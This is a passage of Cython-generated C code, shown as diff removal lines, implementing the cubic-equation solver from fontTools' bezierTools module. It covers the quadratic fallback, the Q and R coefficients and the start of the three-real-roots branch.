- __pyx_t_1 = __Pyx_PyNumber_Absolute(__pyx_v_a); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 879, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 879, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyObject_RichCompare(__pyx_t_1, __pyx_t_2, Py_LT); __Pyx_XGOTREF(__pyx_t_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 879, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_3); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 879, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (__pyx_t_4) { - - /* "fontTools/misc/bezierTools.py":882 - * # don't just test for zero; for very small values of 'a' solveCubic() - * # returns unreliable results, so we fall back to quad. - * return solveQuadratic(b, c, d) # <<<<<<<<<<<<<< - * a = float(a) - * a1 = b / a - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_solveQuadratic); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 882, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_1)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_1, __pyx_v_b, __pyx_v_c, __pyx_v_d}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_5, 3+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 882, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_r = __pyx_t_3; - __pyx_t_3 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":879 - * # found at: http://www.strangecreations.com/library/snippets/Cubic.C - * # - * if abs(a) < epsilon: # <<<<<<<<<<<<<< - * # don't just test for zero; for very small values of 'a' solveCubic() - * # returns unreliable results, so we fall back to quad. - */ - } - - /* "fontTools/misc/bezierTools.py":883 - * # returns unreliable results, so we fall back to quad. - * return solveQuadratic(b, c, d) - * a = float(a) # <<<<<<<<<<<<<< - * a1 = b / a - * a2 = c / a - */ - __pyx_t_3 = __Pyx_PyNumber_Float(__pyx_v_a); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 883, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF_SET(__pyx_v_a, __pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":884 - * return solveQuadratic(b, c, d) - * a = float(a) - * a1 = b / a # <<<<<<<<<<<<<< - * a2 = c / a - * a3 = d / a - */ - __pyx_t_3 = __Pyx_PyNumber_Divide(__pyx_v_b, __pyx_v_a); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 884, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_a1 = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":885 - * a = float(a) - * a1 = b / a - * a2 = c / a # <<<<<<<<<<<<<< - * a3 = d / a - * - */ - __pyx_t_3 = __Pyx_PyNumber_Divide(__pyx_v_c, __pyx_v_a); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 885, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_a2 = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":886 - * a1 = b / a - * a2 = c / a - * a3 = d / a # <<<<<<<<<<<<<< - * - * Q = (a1 * a1 - 3.0 * a2) / 9.0 - */ - __pyx_t_3 = __Pyx_PyNumber_Divide(__pyx_v_d, __pyx_v_a); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 886, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_a3 = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":888 - * a3 = d / a - * - * Q = (a1 * a1 - 3.0 * a2) / 9.0 # <<<<<<<<<<<<<< - * R = (2.0 * a1 * a1 * a1 - 9.0 * a1 * a2 + 27.0 * a3) / 54.0 - * - */ - __pyx_t_3 = PyNumber_Multiply(__pyx_v_a1, __pyx_v_a1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 888, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = PyNumber_Multiply(__pyx_float_3_0, __pyx_v_a2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 888, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Subtract(__pyx_t_3, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 888, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_1, __pyx_float_9_0, 9.0, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 888, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_v_Q = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":889 - * - * Q = (a1 * a1 - 3.0 * a2) / 9.0 - * R = (2.0 * a1 * a1 * a1 - 9.0 * a1 * a2 + 27.0 * a3) / 54.0 # <<<<<<<<<<<<<< - * - * R2 = R * R - */ - __pyx_t_2 = PyNumber_Multiply(__pyx_float_2_0, __pyx_v_a1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 889, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_2, __pyx_v_a1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 889, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Multiply(__pyx_t_1, __pyx_v_a1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 889, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Multiply(__pyx_float_9_0, __pyx_v_a1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 889, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = PyNumber_Multiply(__pyx_t_1, __pyx_v_a2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 889, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Subtract(__pyx_t_2, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 889, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Multiply(__pyx_float_27_0, __pyx_v_a3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 889, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = PyNumber_Add(__pyx_t_1, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 889, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_2, __pyx_float_54_0, 54.0, 0, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 889, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_R = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":891 - * R = (2.0 * a1 * a1 * a1 - 9.0 * a1 * a2 + 27.0 * a3) / 54.0 - * - * R2 = R * R # <<<<<<<<<<<<<< - * Q3 = Q * Q * Q - * R2 = 0 if R2 < epsilon else R2 - */ - __pyx_t_3 = PyNumber_Multiply(__pyx_v_R, __pyx_v_R); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 891, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_R2 = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":892 - * - * R2 = R * R - * Q3 = Q * Q * Q # <<<<<<<<<<<<<< - * R2 = 0 if R2 < epsilon else R2 - * Q3 = 0 if abs(Q3) < epsilon else Q3 - */ - __pyx_t_3 = PyNumber_Multiply(__pyx_v_Q, __pyx_v_Q); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 892, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_3, __pyx_v_Q); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 892, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_v_Q3 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":893 - * R2 = R * R - * Q3 = Q * Q * Q - * R2 = 0 if R2 < epsilon else R2 # <<<<<<<<<<<<<< - * Q3 = 0 if abs(Q3) < epsilon else Q3 - * - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 893, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = PyObject_RichCompare(__pyx_v_R2, __pyx_t_3, Py_LT); __Pyx_XGOTREF(__pyx_t_1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 893, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 893, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_4) { - __Pyx_INCREF(__pyx_int_0); - __pyx_t_2 = __pyx_int_0; - } else { - __Pyx_INCREF(__pyx_v_R2); - __pyx_t_2 = __pyx_v_R2; - } - __Pyx_DECREF_SET(__pyx_v_R2, __pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":894 - * Q3 = Q * Q * Q - * R2 = 0 if R2 < epsilon else R2 - * Q3 = 0 if abs(Q3) < epsilon else Q3 # <<<<<<<<<<<<<< - * - * R2_Q3 = R2 - Q3 - */ - __pyx_t_1 = __Pyx_PyNumber_Absolute(__pyx_v_Q3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 894, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 894, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_6 = PyObject_RichCompare(__pyx_t_1, __pyx_t_3, Py_LT); __Pyx_XGOTREF(__pyx_t_6); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 894, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_6); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 894, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - if (__pyx_t_4) { - __Pyx_INCREF(__pyx_int_0); - __pyx_t_2 = __pyx_int_0; - } else { - __Pyx_INCREF(__pyx_v_Q3); - __pyx_t_2 = __pyx_v_Q3; - } - __Pyx_DECREF_SET(__pyx_v_Q3, __pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":896 - * Q3 = 0 if abs(Q3) < epsilon else Q3 - * - * R2_Q3 = R2 - Q3 # <<<<<<<<<<<<<< - * - * if R2 == 0.0 and Q3 == 0.0: - */ - __pyx_t_2 = PyNumber_Subtract(__pyx_v_R2, __pyx_v_Q3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 896, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_v_R2_Q3 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":898 - * R2_Q3 = R2 - Q3 - * - * if R2 == 0.0 and Q3 == 0.0: # <<<<<<<<<<<<<< - * x = round(-a1 / 3.0, epsilonDigits) - * return [x, x, x] - */ - __pyx_t_7 = (__Pyx_PyFloat_BoolEqObjC(__pyx_v_R2, __pyx_float_0_0, 0.0, 0, 0)); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 898, __pyx_L1_error) - if (__pyx_t_7) { - } else { - __pyx_t_4 = __pyx_t_7; - goto __pyx_L5_bool_binop_done; - } - __pyx_t_7 = (__Pyx_PyFloat_BoolEqObjC(__pyx_v_Q3, __pyx_float_0_0, 0.0, 0, 0)); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 898, __pyx_L1_error) - __pyx_t_4 = __pyx_t_7; - __pyx_L5_bool_binop_done:; - if (__pyx_t_4) { - - /* "fontTools/misc/bezierTools.py":899 - * - * if R2 == 0.0 and Q3 == 0.0: - * x = round(-a1 / 3.0, epsilonDigits) # <<<<<<<<<<<<<< - * return [x, x, x] - * elif R2_Q3 <= epsilon * 0.5: - */ - __pyx_t_2 = PyNumber_Negative(__pyx_v_a1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 899, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_6 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_2, __pyx_float_3_0, 3.0, 0, 0); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 899, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_epsilonDigits); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 899, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 899, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_6); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_6)) __PYX_ERR(0, 899, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_2)) __PYX_ERR(0, 899, __pyx_L1_error); - __pyx_t_6 = 0; - __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_PyObject_Call(__pyx_builtin_round, __pyx_t_3, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 899, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_v_x = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":900 - * if R2 == 0.0 and Q3 == 0.0: - * x = round(-a1 / 3.0, epsilonDigits) - * return [x, x, x] # <<<<<<<<<<<<<< - * elif R2_Q3 <= epsilon * 0.5: - * # The epsilon * .5 above ensures that Q3 is not zero. - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_2 = PyList_New(3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 900, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_x); - __Pyx_GIVEREF(__pyx_v_x); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 0, __pyx_v_x)) __PYX_ERR(0, 900, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_x); - __Pyx_GIVEREF(__pyx_v_x); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 1, __pyx_v_x)) __PYX_ERR(0, 900, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_x); - __Pyx_GIVEREF(__pyx_v_x); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 2, __pyx_v_x)) __PYX_ERR(0, 900, __pyx_L1_error); - __pyx_r = __pyx_t_2; - __pyx_t_2 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":898 - * R2_Q3 = R2 - Q3 - * - * if R2 == 0.0 and Q3 == 0.0: # <<<<<<<<<<<<<< - * x = round(-a1 / 3.0, epsilonDigits) - * return [x, x, x] - */ - } - - /* "fontTools/misc/bezierTools.py":901 - * x = round(-a1 / 3.0, epsilonDigits) - * return [x, x, x] - * elif R2_Q3 <= epsilon * 0.5: # <<<<<<<<<<<<<< - * # The epsilon * .5 above ensures that Q3 is not zero. - * theta = acos(max(min(R / sqrt(Q3), 1.0), -1.0)) - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 901, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Multiply(__pyx_t_2, __pyx_float_0_5); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 901, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyObject_RichCompare(__pyx_v_R2_Q3, __pyx_t_3, Py_LE); __Pyx_XGOTREF(__pyx_t_2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 901, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_2); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 901, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - if (__pyx_t_4) { - - /* "fontTools/misc/bezierTools.py":903 - * elif R2_Q3 <= epsilon * 0.5: - * # The epsilon * .5 above ensures that Q3 is not zero. - * theta = acos(max(min(R / sqrt(Q3), 1.0), -1.0)) # <<<<<<<<<<<<<< - * rQ2 = -2.0 * sqrt(Q) - * a1_3 = a1 / 3.0 - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_acos); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_8 = -1.0; - __pyx_t_9 = 1.0; - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_sqrt); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_10 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_1))) { - __pyx_t_10 = PyMethod_GET_SELF(__pyx_t_1); - if (likely(__pyx_t_10)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); - __Pyx_INCREF(__pyx_t_10); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_1, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_10, __pyx_v_Q3}; - __pyx_t_6 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_10); __pyx_t_10 = 0; - if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } - __pyx_t_1 = __Pyx_PyNumber_Divide(__pyx_v_R, __pyx_t_6); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_10 = PyFloat_FromDouble(__pyx_t_9); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __pyx_t_11 = PyObject_RichCompare(__pyx_t_10, __pyx_t_1, Py_LT); __Pyx_XGOTREF(__pyx_t_11); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_11); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; - if (__pyx_t_4) { - __pyx_t_11 = PyFloat_FromDouble(__pyx_t_9); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_11); - __pyx_t_6 = __pyx_t_11; - __pyx_t_11 = 0; - } else { - __Pyx_INCREF(__pyx_t_1); - __pyx_t_6 = __pyx_t_1; - } - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_INCREF(__pyx_t_6); - __pyx_t_1 = __pyx_t_6; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_11 = PyFloat_FromDouble(__pyx_t_8); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_11); - __pyx_t_10 = PyObject_RichCompare(__pyx_t_11, __pyx_t_1, Py_GT); __Pyx_XGOTREF(__pyx_t_10); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_10); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - if (__pyx_t_4) { - __pyx_t_10 = PyFloat_FromDouble(__pyx_t_8); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __pyx_t_6 = __pyx_t_10; - __pyx_t_10 = 0; - } else { - __Pyx_INCREF(__pyx_t_1); - __pyx_t_6 = __pyx_t_1; - } - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_1)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_t_6}; - __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_v_theta = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":904 - * # The epsilon * .5 above ensures that Q3 is not zero. - * theta = acos(max(min(R / sqrt(Q3), 1.0), -1.0)) - * rQ2 = -2.0 * sqrt(Q) # <<<<<<<<<<<<<< - * a1_3 = a1 / 3.0 - * x0 = rQ2 * cos(theta / 3.0) - a1_3 - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_sqrt); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 904, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_6 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_6)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_6); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_6, __pyx_v_Q}; - __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; - if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 904, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_3 = PyNumber_Multiply(__pyx_float_neg_2_0, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 904, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_rQ2 = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":905 - * theta = acos(max(min(R / sqrt(Q3), 1.0), -1.0)) - * rQ2 = -2.0 * sqrt(Q) - * a1_3 = a1 / 3.0 # <<<<<<<<<<<<<< - * x0 = rQ2 * cos(theta / 3.0) - a1_3 - * x1 = rQ2 * cos((theta + 2.0 * pi) / 3.0) - a1_3 - */ - __pyx_t_3 = __Pyx_PyFloat_TrueDivideObjC(__pyx_v_a1, __pyx_float_3_0, 3.0, 0, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 905, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_a1_3 = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":906 - * rQ2 = -2.0 * sqrt(Q) - * a1_3 = a1 / 3.0 - * x0 = rQ2 * cos(theta / 3.0) - a1_3 # <<<<<<<<<<<<<< - * x1 = rQ2 * cos((theta + 2.0 * pi) / 3.0) - a1_3 - * x2 = rQ2 * cos((theta + 4.0 * pi) / 3.0) - a1_3 - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_cos); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 906, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_6 = __Pyx_PyFloat_TrueDivideObjC(__pyx_v_theta, __pyx_float_3_0, 3.0, 0, 0); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 906, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_1 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_1)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_t_6}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 906, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_t_2 = PyNumber_Multiply(__pyx_v_rQ2, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 906, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Subtract(__pyx_t_2, __pyx_v_a1_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 906, __pyx_L1_error) - 